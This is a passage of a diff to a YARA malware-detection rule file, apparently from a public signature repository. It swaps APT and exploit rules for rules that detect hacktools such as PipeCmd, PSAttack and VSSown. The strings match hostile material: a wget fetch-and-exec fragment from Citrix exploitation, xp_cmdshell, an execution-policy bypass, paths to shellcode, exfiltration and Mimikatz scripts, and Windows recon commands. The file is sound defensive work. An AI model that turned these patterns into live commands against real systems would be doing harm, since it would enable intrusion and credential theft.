+		logic_hash = "e1b745bd321527cee3eb203847d00c9eda4a7b1e498cb8f0ad6b588f87221759"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		hash1 = "c6a54912f77a39c8f909a66a940350dcd8474c7a1d0e215a878349f1b038c58a"
+		tags = "APT, FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		confidential = false
 
 	strings:
-		$s1 = "WioGLtonuaptWmrnttfepgetneemVsnygnV" fullword ascii
-		$s2 = "PnSenariopoeKerGEtxrcy" fullword ascii
+		$s2 = "TCP 12.12.12.12"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and 2 of them
+		uint16( 0 ) == 0x5A4D and $s2
 }
-rule SIGNATURE_BASE_APT_Greyenergy_Malware_Oct18_3 : FILE
+rule SIGNATURE_BASE_WMI_Vbs : APT
 {
 	meta:
-		description = "Detects samples from Grey Energy report"
+		description = "WMI Tool - APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cc365dbf-1448-5219-95f5-d1154000f52d"
-		date = "2018-10-17"
-		modified = "2023-12-05"
-		reference = "https://www.welivesecurity.com/2018/10/17/greyenergy-updated-arsenal-dangerous-threat-actors/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_greyenergy.yar#L46-L60"
+		id = "b367306a-38d8-5f4d-8f09-2bf025831f0a"
+		date = "2013-11-29"
+		modified = "2025-12-18"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2936-L2949"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f4851f5381a4d8dea488d50ff11048052826c51428f8610bc5d3480ed254d32f"
-		score = 75
+		logic_hash = "94163981c1a80838d1bea1b21f713f1d8fbdac8704319d1a145f0b4f6d8ff3f6"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		hash1 = "0db5e5b68dc4b8089197de9c1e345056f45c006b7b487f7d8d57b49ae385bad0"
+		tags = "APT"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		confidential = false
 
 	strings:
-		$x1 = "USQTUNPPQONOPOQUMSNUTRMRRLVPUOPMROPMPMQTPNPONVUOUQOMMNNSRSRQQVTPPRSSNVSTURTMMOPTONSQTOMONQVMQNUSONTQTUTSRRPVTONUQNORQMRRNRUSPS" fullword ascii
-		$x2 = "tEMPiuP" fullword ascii
-		$x3 = "sryCEMieye" fullword ascii
+		$s3 = "WScript.Echo \"   $$\\      $$\\ $$\\      $$\\ $$$$$$\\ $$$$$$$$\\ $$\\   $$\\ $$$$$$$$\\  $$$$$$"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them
+		all of them
 }
+rule SIGNATURE_BASE_CN_Toolset__Xscanlib_Xscanlib_Xscanlib
+{
+	meta:
+		description = "Detects a Chinese hacktool from a disclosed toolset - from files XScanLib.dll, XScanLib.dll, XScanLib.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c32415f4-044c-50ef-9c4c-b9327cbcef69"
+		date = "2015-03-30"
+		modified = "2025-12-18"
+		reference = "http://qiannao.com/ls/905300366/33834c0c/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2951-L2972"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		logic_hash = "f7f66f1f3ca05e60ac850fbb94c471f664d2dc8a60c09b18686c9f2937296697"
+		score = 70
+		quality = 85
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "af419603ac28257134e39683419966ab3d600ed2"
+		hash1 = "c5cb4f75cf241f5a9aea324783193433a42a13b0"
+		hash2 = "135f6a28e958c8f6a275d8677cfa7cb502c8a822"
 
-rule SIGNATURE_BASE_APT_Greyenergy_Malware_Oct18_4 : FILE
+	strings:
+		$s1 = "Plug-in thread causes an exception, failed to alert user." fullword
+		$s2 = "PlugGetUdpPort" fullword
+		$s3 = "XScanLib.dll" fullword
+		$s4 = "PlugGetTcpPort" fullword
+		$s11 = "PlugGetVulnNum" fullword
+
+	condition:
+		all of them
+}
+rule SIGNATURE_BASE_CN_Toolset_Ntscan_Pipecmd
 {
 	meta:
-		description = "Detects samples from Grey Energy report"
+		description = "Detects a Chinese hacktool from a disclosed toolset - file PipeCmd.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1a2df257-a639-5868-a005-690d64cfbf2b"
-		date = "2018-10-17"
-		modified = "2023-12-05"
-		reference = "https://www.welivesecurity.com/2018/10/17/greyenergy-updated-arsenal-dangerous-threat-actors/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_greyenergy.yar#L62-L82"
+		id = "056ee42d-23f4-5b03-b240-392bc92b90b0"
+		date = "2015-03-30"
+		modified = "2025-12-18"
+		reference = "http://qiannao.com/ls/905300366/33834c0c/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2974-L2998"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c845be8b56dc9aa9f0eaec2a67c4baef9c9b4fd1789e96cd781e3876721b1297"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		hash1 = "6974b8acf6a8f7684673b01753c3a8248a1c491900cccf771db744ca0442f96a"
-		hash2 = "165a7853ef51e96ce3f88bb33f928925b24ca5336e49845fc5fc556812092740"
-		hash3 = "4470e40f63443aa27187a36bbb0c2f4def42b589b61433630df842b6e365ae3d"
-		hash4 = "c21cf6018c2ee0a90b9d2c401aae8071c90b5a4bc9848a94d678d77209464f79"
+		hash = "a931d65de66e1468fe2362f7f2e0ee546f225c4e"
+		logic_hash = "2dab5a4de2abeff5659aa90fbc82bef359937ca9e45e8805b509baeb16943531"
+		score = 70
+		quality = 60
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "iiodttd.eWt" fullword ascii
-		$x2 = "irnnaar-ite-ornaa-naa-asoeienaeaanlagoeas:acnuihaaa" fullword ascii
-		$x3 = "NURVNTURVORSMSPPRTQMPTTQOQRP" fullword ascii
+		$s2 = "Please Use NTCmd.exe Run This Program." fullword ascii
+		$s3 = "PipeCmd.exe" fullword wide
+		$s4 = "\\\\.\\pipe\\%s%s%d" fullword ascii
+		$s5 = "%s\\pipe\\%s%s%d" fullword ascii
+		$s6 = "%s\\ADMIN$\\System32\\%s%s" fullword ascii
+		$s7 = "%s\\ADMIN$\\System32\\%s" fullword ascii
+		$s9 = "PipeCmdSrv.exe" fullword ascii
+		$s10 = "This is a service executable! Couldn't start directly." fullword ascii
+		$s13 = "\\\\.\\pipe\\PipeCmd_communicaton" fullword ascii
+		$s14 = "PIPECMDSRV" fullword wide
+		$s15 = "PipeCmd Service" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "279adfbd42308a07b3131ee57d067b3e" or 1 of them )
+		4 of them
 }
-rule SIGNATURE_BASE_APT_Greyenergy_Malware_Oct18_5 : FILE
+rule SIGNATURE_BASE_CN_Toolset_Lscanportss_2
 {
 	meta:
-		description = "Detects samples from Grey Energy report"
+		description = "Detects a Chinese hacktool from a disclosed toolset - file LScanPortss.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a8c4517d-912d-5264-b9ab-acdf37fc4d56"
-		date = "2018-10-17"
-		modified = "2023-12-05"
-		reference = "https://www.welivesecurity.com/2018/10/17/greyenergy-updated-arsenal-dangerous-threat-actors/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_greyenergy.yar#L84-L97"
+		id = "0a796585-5fc8-5b55-acfc-3fe87308b681"
+		date = "2015-03-30"
+		modified = "2025-12-18"
+		reference = "http://qiannao.com/ls/905300366/33834c0c/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3000-L3020"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3ced67c514d54324b41a4a4a92c1d3138e75380f3129b39ae92c1895c267acb2"
-		score = 75
+		hash = "4631ec57756466072d83d49fbc14105e230631a0"
+		logic_hash = "aeecdbef3fe6d66a209df10b44046783e53ef12f67c6877309cb219db4354733"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		hash1 = "037723bdb9100d19bf15c5c21b649db5f3f61e421e76abe9db86105f1e75847b"
-		hash2 = "b602ce32b7647705d68aedbaaf4485f1a68253f8f8132bd5d5f77284a6c2d8bb"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s12 = "WespySSld.eQ" fullword ascii
+		$s1 = "LScanPort.EXE" fullword wide
+		$s3 = "www.honker8.com" fullword wide
+		$s4 = "DefaultPort.lst" fullword ascii
+		$s5 = "Scan over.Used %dms!" fullword ascii
+		$s6 = "www.hf110.com" fullword wide
+		$s15 = "LScanPort Microsoft " fullword wide
+		$s18 = "L-ScanPort2.0 CooFly" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them
+		4 of them
 }
-rule SIGNATURE_BASE_EXPL_Shitrix_Exploit_Code_Jan20_1 : FILE CVE_2019_19781
+rule SIGNATURE_BASE_CN_Toolset_Sig_1433_135_Sqlr
 {
 	meta:
-		description = "Detects payloads used in Shitrix exploitation CVE-2019-19781"
+		description = "Detects a Chinese hacktool from a disclosed toolset - file sqlr.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7fab3a9b-82a5-573a-b210-2ae65f1a7f24"
-		date = "2020-01-13"
-		modified = "2023-12-05"
-		reference = "https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+Overview+of+Observed+Payloads/25704/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_shitrix.yar#L2-L29"
+		id = "74038975-ef06-53d6-bdcc-02706408b596"
+		date = "2015-03-30"
+		modified = "2025-12-18"
+		reference = "http://qiannao.com/ls/905300366/33834c0c/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3022-L3039"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "00687b30235be5ef3c00432b5b96bbc325dee553e7c0cb565d6f389b1bce12de"
+		hash = "8542c7fb8291b02db54d2dc58cd608e612bfdc57"
+		logic_hash = "14c9d104cfb71a2d3545bfb6274e3a282d4597f38057187d76adaf26fe2718fa"
 		score = 70
 		quality = 85
-		tags = "FILE, CVE-2019-19781"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s01 = "/netscaler/portal/scripts/rmpm.pl" ascii
-		$s02 = "tee /netscaler/portal/templates/" ascii
-		$s03 = "exec(\\'(wget -q -O- http://" ascii
-		$s04 = "cd /netscaler/portal; ls" ascii
-		$s05 = "cat /flash/nsconfig/ns.conf" ascii
-		$s06 = "/netscaler/portal/scripts/PersonalBookmak.pl" ascii
-		$s07 = "template.new({'BLOCK'='print readpipe(" ascii
-		$s08 = "pwnpzi1337" fullword ascii
-		$s09 = "template.new({'BLOCK'="
-		$s10 = "template.new({'BLOCK'%3d"
-		$s11 = "my ($citrixmd, %FORM);"
-		$s12 = "(CMD, \"($citrixmd) 2>&1"
-		$b1 = "NSC_USER:" ascii nocase
-		$b2 = "NSC_NONCE:" ascii nocase
-		$b3 = "/../" ascii
+		$s0 = "Connect to %s MSSQL server success. Type Command at Prompt." fullword ascii
+		$s11 = ";DATABASE=master" fullword ascii
+		$s12 = "xp_cmdshell '" fullword ascii
+		$s14 = "SELECT * FROM OPENROWSET('SQLOLEDB','Trusted_Connection=Yes;Data Source=myserver" ascii
 
 	condition:
-		1 of ( $s* ) or all of ( $b* )
+		all of them
 }
-rule SIGNATURE_BASE_EXPL_CVE_2024_21413_Microsoft_Outlook_RCE_Feb24 : CVE_2024_21413 FILE
+rule SIGNATURE_BASE_Darkcomet_Keylogger_File : FILE
 {
 	meta:
-		description = "Detects emails that contain signs of a method to exploit CVE-2024-21413 in Microsoft Outlook"
-		author = "X__Junior, Florian Roth"
-		id = "4512ca7b-0755-565e-84f1-596552949aa5"
-		date = "2024-02-17"
-		modified = "2024-02-19"
-		reference = "https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_outlook_cve_2024_21413.yar#L2-L20"
+		description = "Looks like a keylogger file created by DarkComet Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "65058450-3ae3-5b85-bcc5-8bc1fab14614"
+		date = "2014-07-25"
+		modified = "2025-12-18"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3041-L3054"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "06cfafe0b92949e493dca6d54f671d0607242d97341144b69f563a0cc24dc6a1"
-		score = 75
-		quality = 60
-		tags = "CVE-2024-21413, FILE"
+		logic_hash = "28f2eb8f5082559f9de4e72243f4bf8a0be21a9a4c5e16c443d036733584ea97"
+		score = 50
+		quality = 35
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "Subject: "
-		$a2 = "Received: "
-		$xr1 = /file:\/\/\/\\\\[^"']{6,600}\.(docx|txt|pdf|xlsx|pptx|odt|etc|jpg|png|gif|bmp|tiff|svg|mp4|avi|mov|wmv|flv|mkv|mp3|wav|aac|flac|ogg|wma|exe|msi|bat|cmd|ps1|zip|rar|7z|targz|iso|dll|sys|ini|cfg|reg|html|css|java|py|c|cpp|db|sql|mdb|accdb|sqlite|eml|pst|ost|mbox|htm|php|asp|jsp|xml|ttf|otf|woff|woff2|rtf|chm|hta|js|lnk|vbe|vbs|wsf|xls|xlsm|xltm|xlt|doc|docm|dot|dotm)!/
+		$entry = /\n:: [A-Z]/
+		$timestamp = /\([0-9]?[0-9]:[0-9][0-9]:[0-9][0-9] [AP]M\)/
 
 	condition:
-		filesize < 1000KB and all of ( $a* ) and 1 of ( $xr* )
+		uint16( 0 ) == 0x3A3A and #entry > 10 and #timestamp > 10
 }
-rule SIGNATURE_BASE_Irongate_APT_Step7Prosim_Gen : FILE
+rule SIGNATURE_BASE_Vssown_VBS
 {
 	meta:
-		description = "Detects IronGate APT Malware - Step7ProSim DLL"
+		description = "Detects VSSown.vbs script - used to export shadow copy elements like NTDS to take away and crack elsewhere"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a73cf9e2-c24f-5553-92e2-3a1a882a4a06"
-		date = "2016-06-04"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/Mr6M2J"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_irongate.yar#L10-L40"
+		id = "ffbb5faf-3522-50dc-a568-503074ac0636"
+		date = "2015-10-01"
+		modified = "2025-12-18"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3056-L3073"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "aab41ada32a8186f958baccad08b60ac1ab686f7561d4dd4471a1e88ddd53730"
-		score = 90
+		logic_hash = "f49e9d7a07d591330e16fc539bd98d019b47dd8579d0f1ad92fa987790e64189"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0539af1a0cc7f231af8f135920a990321529479f6534c3b64e571d490e1514c3"
-		hash2 = "fa8400422f3161206814590768fc1a27cf6420fc5d322d52e82899ac9f49e14f"
-		hash3 = "5ab1672b15de9bda84298e0bb226265af09b70a9f0b26d6dfb7bdd6cbaed192d"
 
 	strings:
-		$x1 = "\\obj\\Release\\Step7ProSim.pdb" ascii
-		$s1 = "Step7ProSim.Interfaces" fullword ascii
-		$s2 = "payloadExecutionTimeInMilliSeconds" fullword ascii
-		$s3 = "PackagingModule.Step7ProSim.dll" fullword wide
-		$s4 = "<KillProcess>b__0" fullword ascii
-		$s5 = "newDllFilename" fullword ascii
-		$s6 = "PackagingModule.exe" fullword wide
-		$s7 = "$863d8af0-cee6-4676-96ad-13e8540f4d47" fullword ascii
-		$s8 = "RunPlcSim" fullword ascii
-		$s9 = "$ccc64bc5-ef95-4217-adc4-5bf0d448c272" fullword ascii
-		$s10 = "InstallProxy" fullword ascii
-		$s11 = "DllProxyInstaller" fullword ascii
-		$s12 = "FindFileInDrive" fullword ascii
+		$s0 = "Select * from Win32_Service Where Name ='VSS'" ascii
+		$s1 = "Select * From Win32_ShadowCopy" ascii
+		$s2 = "cmd /C mklink /D " ascii
+		$s3 = "ClientAccessible" ascii
+		$s4 = "WScript.Shell" ascii
+		$s5 = "Win32_Process" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 50KB and ( $x1 or 3 of ( $s* ) ) ) or ( 6 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Irongate_Pyinstaller_Update_EXE : FILE
+rule SIGNATURE_BASE_Netview_Hacktool : FILE
 {
 	meta:
-		description = "Detects a PyInstaller file named update.exe as mentioned in the IronGate APT"
+		description = "Network domain enumeration tool - often used by attackers - file Nv.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f8d1b97e-86d9-547f-a212-a84fb068af3c"
-		date = "2016-06-04"
-		modified = "2023-01-06"
-		reference = "https://goo.gl/Mr6M2J"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_irongate.yar#L42-L62"
+		id = "087e2fd7-726e-5c6b-ba99-e20dd3337d6a"
+		date = "2016-03-07"
+		modified = "2025-12-18"
+		reference = "https://github.com/mubix/netview"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3075-L3098"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b55e02af900b3510743502bd72d5e14c9235985b5a7b05def0f5c462b28f2216"
+		hash = "52cec98839c3b7d9608c865cfebc904b4feae0bada058c2e8cdbd561cfa1420a"
+		logic_hash = "dc27d2358937d736823891c9d5c3f41f83a6f4e72d35fae0983435effda2141a"
 		score = 60
 		quality = 85
 		tags = "FILE"
-		hash1 = "2044712ceb99972d025716f0f16aa039550e22a63000d2885f7b7cd50f6834e0"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "bpython27.dll" fullword ascii
-		$s5 = "%s%s.exe" fullword ascii
-		$s6 = "bupdate.exe.manifest" fullword ascii
-		$s9 = "bunicodedata.pyd" fullword ascii
-		$s11 = "distutils.sysconfig(" ascii
-		$s16 = "distutils.debug(" ascii
-		$s18 = "supdate" fullword ascii
+		$s1 = "[+] %ws - Target user found - %s\\%s" fullword wide
+		$s2 = "[*] -g used without group specified - using \"Domain Admins\"" fullword ascii
+		$s3 = "[*] -i used without interval specified - ignoring" fullword ascii
+		$s4 = "[+] %ws - Session - %s from %s - Active: %d - Idle: %d" fullword wide
+		$s5 = "[+] %ws - Backup Domain Controller" fullword wide
+		$s6 = "[-] %ls - Share - Error: %ld" fullword wide
+		$s7 = "[-] %ls - Session - Error: %ld" fullword wide
+		$s8 = "[+] %s - OS Version - %d.%d" fullword ascii
+		$s9 = "Enumerating Logged-on Users" fullword ascii
+		$s10 = ": Specifies a domain to pull a list of hosts from" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and 2 of them ) or 3 of them
 }
-rule SIGNATURE_BASE_Nirsoft_Netresview : FILE
+rule SIGNATURE_BASE_Netview_Hacktool_Output
 {
 	meta:
-		description = "Detects NirSoft NetResView - utility that displays the list of all network resources"
+		description = "Network domain enumeration tool output - often used by attackers - file filename.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bf786432-3ecf-510e-8d95-50aff09826ce"
-		date = "2016-06-04"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/Mr6M2J"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_irongate.yar#L67-L82"
+		id = "259db870-6293-5a55-b56a-f981c060c18f"
+		date = "2016-03-07"
+		modified = "2025-12-18"
+		reference = "https://github.com/mubix/netview"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3100-L3115"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "56c3c7a98bcefa609ee604ea0d7d3f4dd237d91a9439eeed66e0d6f3a20dfdd0"
-		score = 40
+		logic_hash = "38a51e583b1485bdb29400cb9d0a73ec4d5387675779f949572d2b4d74da4230"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "83f0352c14fa62ae159ab532d85a2b481900fed50d32cc757aa3f4ccf6a13bee"
 
 	strings:
-		$s1 = "NetResView.exe" fullword wide
-		$s2 = "2005 - 2013 Nir Sofer" wide
+		$s1 = "[*] Using interval:" fullword
+		$s2 = "[*] Using jitter:" fullword
+		$s3 = "[+] Number of hosts:" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_APT_MAL_BKA_Goldenspy_Aug20_1 : FILE
+rule SIGNATURE_BASE_Psattack_EXE : FILE
 {
 	meta:
-		description = "Detects variants of GoldenSpy Malware"
-		author = "BKA"
-		id = "4f47087e-6e68-53ff-9446-72a1751da359"
-		date = "2020-08-21"
-		modified = "2023-12-05"
-		reference = "https://www.bka.de/SharedDocs/Kurzmeldungen/DE/Warnhinweise/200821_Cyberspionage.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_goldenspy.yar#L1-L19"
+		description = "PSAttack - Powershell attack tool - file PSAttack.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "87f7956a-f607-5e14-a940-5080499cf682"
+		date = "2016-03-09"
+		modified = "2023-01-06"
+		reference = "https://github.com/gdssecurity/PSAttack/releases/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3126-L3146"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ba81a2b081842aaf06bbf623640a87946894df83fd0d7b7149c48afa8ed0a081"
-		score = 75
-		quality = 85
+		hash = "ad05d75640c850ee7eeee26422ba4f157be10a4e2d6dc6eaa19497d64cf23715"
+		logic_hash = "b73566eb6370fbe68f0477d1179e5d6c19fb9be2c29f63d560c42adcdf19fe58"
+		score = 100
+		quality = 60
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$str01 = {c78510ffffff00000000 c78514ffffff0f000000 c68500ffffff00 c78528ffffff00000000 c7852cffffff0f000000 c68518ffffff00 c78540ffffff00000000 c78544ffffff0f000000 c68530ffffff00 c645fc14 80bd04feffff00}
-		$str02 = "Ryeol HTTP Client Class" ascii
-		$str03 = "----RYEOL-FB3B405B7EAE495aB0C0295C54D4E096-" ascii
-		$str04 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\fwkp.exe" ascii
-		$str05 = "svmm" ascii
-		$str06 = "PROTOCOL_" ascii
-		$str07 = "softList" ascii
-		$str08 = "excuteExe" ascii
+		$x1 = "\\Release\\PSAttack.pdb"
+		$s1 = "set-executionpolicy bypass -Scope process -Force" fullword wide
+		$s2 = "PSAttack.Modules." ascii
+		$s3 = "PSAttack.PSAttackProcessing" fullword ascii
+		$s4 = "PSAttack.Modules.key.txt" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 5 of ( $str* )
+		( uint16( 0 ) == 0x5a4d and ( $x1 or 2 of ( $s* ) ) ) or 3 of them
 }
-rule SIGNATURE_BASE_Recon_Commands_Windows_Gen1 : FILE
+rule SIGNATURE_BASE_Powershell_Attack_Scripts
 {
 	meta:
-		description = "Detects a set of reconnaissance commands on Windows systems"
+		description = "Powershell Attack Scripts"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bc95265c-780d-5451-bd12-d14495877e46"
-		date = "2017-07-10"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/MSJCxP"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_recon_indicators.yar#L12-L50"
+		id = "e8c4a672-229b-56c8-811b-071ae9ff341e"
+		date = "2016-03-09"
+		modified = "2025-12-18"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3148-L3163"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "36beb09c428949140cb007c1022c385c9a1ae4eea8c1f1a419f96b36b8030c7c"
-		score = 60
+		logic_hash = "42a52de089ee00e229499fea23b8acd0b7c881a9c578671aea180c0c018a54e0"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "netstat -an" ascii
-		$s2 = "net view" ascii fullword
-		$s3 = "net user" ascii fullword
-		$s4 = "whoami" ascii
-		$s5 = "tasklist /v" ascii
-		$s6 = "systeminfo" ascii
-		$s7 = "net localgroup administrators" ascii
-		$s8 = "net user administrator" ascii
-		$s9 = "regedit -e " ascii
-		$s10 = "tasklist /svc" ascii
-		$s11 = "regsvr32 /s /u " ascii
-		$s12 = "CreateObject(\"WScript.Shell\").RegWrite" ascii
-		$s13 = "bitsadmin /rawreturn /transfer getfile" ascii
-		$s14 = "wmic qfe list full" ascii
-		$s15 = "schtasks.exe /create " ascii nocase
-		$s16 = "wmic share get" ascii
-		$s17 = "wmic nteventlog get" ascii
-		$s18 = "wevtutil cl " ascii
-		$s19 = "sc query type= service" ascii
-		$s20 = "arp -a " ascii
-		$fp1 = "avdapp.dll" fullword wide
-		$fp2 = "keyword.command.batchfile" ascii
-		$fp3 = ".sublime-settings" ascii
+		$s1 = "PowershellMafia\\Invoke-Shellcode.ps1" ascii
+		$s2 = "Nishang\\Do-Exfiltration.ps1" ascii
+		$s3 = "PowershellMafia\\Invoke-Mimikatz.ps1" ascii
+		$s4 = "Inveigh\\Inveigh.ps1" ascii
 
 	condition:
-		filesize < 1000KB and 4 of them and not 1 of ( $fp* )
+		1 of them
 }
-rule SIGNATURE_BASE_SUSP_Recon_Outputs_Jun20_1 : FILE
+rule SIGNATURE_BASE_Psattack_ZIP : FILE
 {
 	meta:
-		description = "Detects outputs of many different commands often used for reconnaissance purposes"
+		description = "PSAttack - Powershell attack tool - file PSAttack.zip"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ec3759aa-212f-52ce-9f38-636accd35749"
-		date = "2020-06-04"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/cycldek-bridging-the-air-gap/97157/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_recon_indicators.yar#L52-L74"
+		id = "4e064eb4-0b87-590c-9ee4-6764b982c006"
+		date = "2016-03-09"
+		modified = "2025-12-18"
+		reference = "https://github.com/gdssecurity/PSAttack/releases/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3165-L3179"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "652b28bfb45a11eaaee198c76560c1f55edc5b32c5394e606bb5426551260f24"
-		score = 60
+		hash = "3864f0d44f90404be0c571ceb6f95bbea6c527bbfb2ec4a2b4f7d92e982e15a2"
+		logic_hash = "4c869e8663b8c87780d4be622f86b3887511e1ac3cfc67767f1c986af7d43767"
